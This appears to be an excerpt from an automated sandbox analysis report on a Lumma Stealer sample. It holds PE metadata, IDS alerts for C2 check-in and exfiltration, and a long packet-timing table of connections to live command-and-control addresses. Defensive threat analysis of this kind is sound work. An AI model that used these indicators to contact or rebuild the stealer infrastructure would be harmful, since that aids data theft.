                                                                                                                                                                                          .taggant0x49c0000x30000x2200203edeec7e780aebf659c8ca50e1e35fFalse0.06870404411764706DOS executable (COM)0.734067457274334IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                          RT_MANIFEST0x49a52c0x256ASCII text, with CRLF line terminators0.5100334448160535
                                                                                                                                                                                          DLLImport
                                                                                                                                                                                          kernel32.dlllstrcpy
                                                                                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                          2024-11-23T17:44:01.765593+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549704172.67.162.84443TCP
                                                                                                                                                                                          2024-11-23T17:44:02.737901+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549704172.67.162.84443TCP
                                                                                                                                                                                          2024-11-23T17:44:02.737901+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549704172.67.162.84443TCP
                                                                                                                                                                                          2024-11-23T17:44:04.079182+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549705172.67.162.84443TCP
                                                                                                                                                                                          2024-11-23T17:44:05.217531+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549705172.67.162.84443TCP
                                                                                                                                                                                          2024-11-23T17:44:05.217531+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549705172.67.162.84443TCP
                                                                                                                                                                                          2024-11-23T17:44:08.056636+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549706172.67.162.84443TCP
                                                                                                                                                                                          2024-11-23T17:44:10.912847+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549707172.67.162.84443TCP
                                                                                                                                                                                          2024-11-23T17:44:14.053262+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549708172.67.162.84443TCP
                                                                                                                                                                                          2024-11-23T17:44:16.972970+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549709172.67.162.84443TCP
                                                                                                                                                                                          2024-11-23T17:44:17.827198+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549709172.67.162.84443TCP
                                                                                                                                                                                          2024-11-23T17:44:19.742968+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549712172.67.162.84443TCP
                                                                                                                                                                                          2024-11-23T17:44:19.801387+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.549712172.67.162.84443TCP
                                                                                                                                                                                          2024-11-23T17:44:27.647976+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549728172.67.162.84443TCP
                                                                                                                                                                                          2024-11-23T17:44:28.402356+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549728172.67.162.84443TCP
                                                                                                                                                                                          2024-11-23T17:44:30.030651+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.549732185.215.113.1680TCP
                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                          Nov 23, 2024 17:43:56.170619965 CET49675443192.168.2.523.1.237.91
                                                                                                                                                                                          Nov 23, 2024 17:43:56.280124903 CET49673443192.168.2.523.1.237.91
                                                                                                                                                                                          Nov 23, 2024 17:43:56.311223984 CET49674443192.168.2.523.1.237.91
                                                                                                                                                                                          Nov 23, 2024 17:44:00.531683922 CET49704443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:00.531728029 CET44349704172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:00.531975031 CET49704443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:00.533298969 CET49704443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:00.533318043 CET44349704172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:01.765455008 CET44349704172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:01.765593052 CET49704443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:01.838319063 CET49704443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:01.838376999 CET44349704172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:01.838627100 CET44349704172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:01.889353991 CET49704443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:02.025482893 CET49704443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:02.025526047 CET49704443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:02.025670052 CET44349704172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:02.737896919 CET44349704172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:02.737987041 CET44349704172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:02.738046885 CET49704443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:02.740547895 CET49704443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:02.740572929 CET44349704172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:02.740595102 CET49704443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:02.740602970 CET44349704172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:02.854784012 CET49705443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:02.854840040 CET44349705172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:02.854921103 CET49705443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:02.855307102 CET49705443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:02.855323076 CET44349705172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:04.079096079 CET44349705172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:04.079181910 CET49705443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:04.081101894 CET49705443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:04.081110001 CET44349705172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:04.081312895 CET44349705172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:04.083379030 CET49705443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:04.083420992 CET49705443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:04.083456993 CET44349705172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:05.217497110 CET44349705172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:05.217540979 CET44349705172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:05.217567921 CET44349705172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:05.217598915 CET44349705172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:05.217616081 CET49705443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:05.217633009 CET44349705172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:05.217664957 CET49705443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:05.217667103 CET44349705172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:05.217695951 CET44349705172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:05.217717886 CET49705443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:05.217721939 CET44349705172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:05.217758894 CET49705443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:05.225822926 CET44349705172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:05.234330893 CET44349705172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:05.234416008 CET49705443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:05.234421968 CET44349705172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:05.279882908 CET49705443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:05.279891968 CET44349705172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:05.320897102 CET49705443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:05.337188005 CET44349705172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:05.389262915 CET49705443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:05.409260988 CET44349705172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:05.409308910 CET44349705172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:05.409368038 CET49705443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:05.409373045 CET44349705172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:05.409427881 CET49705443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:05.409610033 CET49705443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:05.409624100 CET44349705172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:05.409638882 CET49705443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:05.409643888 CET44349705172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:05.541724920 CET49706443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:05.541778088 CET44349706172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:05.541861057 CET49706443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:05.542203903 CET49706443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:05.542222977 CET44349706172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:05.779927969 CET49675443192.168.2.523.1.237.91
                                                                                                                                                                                          Nov 23, 2024 17:44:05.889331102 CET49673443192.168.2.523.1.237.91
                                                                                                                                                                                          Nov 23, 2024 17:44:05.920578003 CET49674443192.168.2.523.1.237.91
                                                                                                                                                                                          Nov 23, 2024 17:44:08.056562901 CET44349706172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:08.056636095 CET49706443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:08.067487955 CET49706443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:08.067512989 CET44349706172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:08.067724943 CET44349706172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:08.070553064 CET49706443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:08.070832014 CET49706443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:08.070867062 CET44349706172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:08.507961988 CET4434970323.1.237.91192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:08.508140087 CET49703443192.168.2.523.1.237.91
                                                                                                                                                                                          Nov 23, 2024 17:44:09.296026945 CET44349706172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:09.296268940 CET44349706172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:09.296377897 CET49706443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:09.296613932 CET49706443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:09.296633005 CET44349706172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:09.457582951 CET49707443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:09.457609892 CET44349707172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:09.457711935 CET49707443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:09.458107948 CET49707443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:09.458120108 CET44349707172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:10.912761927 CET44349707172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:10.912847042 CET49707443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:10.928100109 CET49707443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:10.928133965 CET44349707172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:10.928881884 CET44349707172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:10.933384895 CET49707443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:10.934295893 CET49707443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:10.934351921 CET44349707172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:10.934412003 CET49707443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:10.979346991 CET44349707172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:12.105596066 CET44349707172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:12.105669022 CET44349707172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:12.105952024 CET49707443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:12.106029987 CET49707443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:12.106050014 CET44349707172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:12.369489908 CET49708443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:12.369546890 CET44349708172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:12.369653940 CET49708443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:12.370004892 CET49708443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:12.370023012 CET44349708172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:14.053178072 CET44349708172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:14.053261995 CET49708443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:14.055633068 CET49708443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:14.055649996 CET44349708172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:14.055905104 CET44349708172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:14.057746887 CET49708443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:14.057941914 CET49708443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:14.057976961 CET44349708172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:14.058036089 CET49708443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:14.058048964 CET44349708172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:15.019364119 CET44349708172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:15.019469976 CET44349708172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:15.019562960 CET49708443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:15.019838095 CET49708443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:15.019857883 CET44349708172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:15.480077028 CET49709443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:15.480112076 CET44349709172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:15.480196953 CET49709443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:15.480540991 CET49709443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:15.480554104 CET44349709172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:16.972897053 CET44349709172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:16.972970009 CET49709443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:16.974977016 CET49709443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:16.974982977 CET44349709172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:16.975305080 CET44349709172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:16.977432966 CET49709443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:16.977526903 CET49709443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:16.977531910 CET44349709172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:17.222920895 CET49711443192.168.2.552.149.20.212
                                                                                                                                                                                          Nov 23, 2024 17:44:17.222995996 CET4434971152.149.20.212192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:17.223068953 CET49711443192.168.2.552.149.20.212
                                                                                                                                                                                          Nov 23, 2024 17:44:17.232589960 CET49711443192.168.2.552.149.20.212
                                                                                                                                                                                          Nov 23, 2024 17:44:17.232630014 CET4434971152.149.20.212192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:17.827295065 CET44349709172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:17.827500105 CET44349709172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:17.827583075 CET49709443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:17.827691078 CET49709443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:17.827708006 CET44349709172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:18.399971008 CET49712443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:18.400008917 CET44349712172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:18.400702000 CET49712443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:18.401076078 CET49712443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:18.401093006 CET44349712172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:19.061043978 CET4434971152.149.20.212192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:19.061182022 CET49711443192.168.2.552.149.20.212
                                                                                                                                                                                          Nov 23, 2024 17:44:19.064532995 CET49711443192.168.2.552.149.20.212
                                                                                                                                                                                          Nov 23, 2024 17:44:19.064548016 CET4434971152.149.20.212192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:19.064981937 CET4434971152.149.20.212192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:19.108009100 CET49711443192.168.2.552.149.20.212
                                                                                                                                                                                          Nov 23, 2024 17:44:19.742810965 CET44349712172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:19.742968082 CET49712443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:19.773844004 CET49712443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:19.773864031 CET44349712172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:19.774678946 CET44349712172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:19.785264015 CET49714443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:19.785303116 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:19.785377026 CET49714443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:19.785763979 CET49714443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:19.785777092 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:19.799319983 CET49712443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:19.800349951 CET49712443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:19.800406933 CET44349712172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:19.800515890 CET49712443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:19.800560951 CET44349712172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:19.800656080 CET49712443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:19.800939083 CET44349712172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:19.801084042 CET49712443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:19.801105022 CET44349712172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:19.801279068 CET49712443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:19.801300049 CET44349712172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:19.801464081 CET49712443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:19.801496029 CET49712443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:19.801565886 CET44349712172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:19.801744938 CET49712443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:19.801786900 CET49712443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:19.801791906 CET44349712172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:19.801850080 CET44349712172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:19.801965952 CET49712443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:19.801986933 CET44349712172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:19.802016020 CET49712443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:19.802082062 CET49712443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:19.802104950 CET49712443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:19.802134037 CET49712443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:19.847338915 CET44349712172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:19.847481966 CET49712443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:19.873677969 CET49712443192.168.2.5172.67.162.84
                                                                                                                                                                                          Nov 23, 2024 17:44:19.891360044 CET44349712172.67.162.84192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:20.976325989 CET49711443192.168.2.552.149.20.212
                                                                                                                                                                                          Nov 23, 2024 17:44:21.019339085 CET4434971152.149.20.212192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:21.838757992 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:21.838854074 CET49714443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:21.845187902 CET49714443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:21.845206976 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:21.845593929 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:21.854536057 CET49714443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:21.869961023 CET4434971152.149.20.212192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:21.869988918 CET4434971152.149.20.212192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:21.869998932 CET4434971152.149.20.212192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:21.870016098 CET4434971152.149.20.212192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:21.870048046 CET4434971152.149.20.212192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:21.870065928 CET49711443192.168.2.552.149.20.212
                                                                                                                                                                                          Nov 23, 2024 17:44:21.870084047 CET4434971152.149.20.212192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:21.870105028 CET49711443192.168.2.552.149.20.212
                                                                                                                                                                                          Nov 23, 2024 17:44:21.870198965 CET49711443192.168.2.552.149.20.212
                                                                                                                                                                                          Nov 23, 2024 17:44:21.899338961 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:22.053915977 CET4434971152.149.20.212192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:22.054003000 CET49711443192.168.2.552.149.20.212
                                                                                                                                                                                          Nov 23, 2024 17:44:22.054008007 CET4434971152.149.20.212192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:22.054069042 CET49711443192.168.2.552.149.20.212
                                                                                                                                                                                          Nov 23, 2024 17:44:22.829689026 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:22.829716921 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:22.829735994 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:22.829843998 CET49714443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:22.829860926 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:22.830029011 CET49714443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:23.218131065 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:23.218153954 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:23.218189001 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:23.218241930 CET49714443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:23.218260050 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:23.218333006 CET49714443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:23.218333006 CET49714443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:23.314421892 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:23.314455986 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:23.314584017 CET49714443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:23.314608097 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:23.314662933 CET49714443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:23.372992039 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:23.373030901 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:23.373095036 CET49714443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:23.373130083 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:23.373156071 CET49714443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:23.373183012 CET49714443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:23.435645103 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:23.435687065 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:23.435796022 CET49714443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:23.435813904 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:23.435874939 CET49714443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:23.461849928 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:23.461890936 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:23.461966991 CET49714443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:23.461978912 CET4434971413.107.246.63192.168.2.5
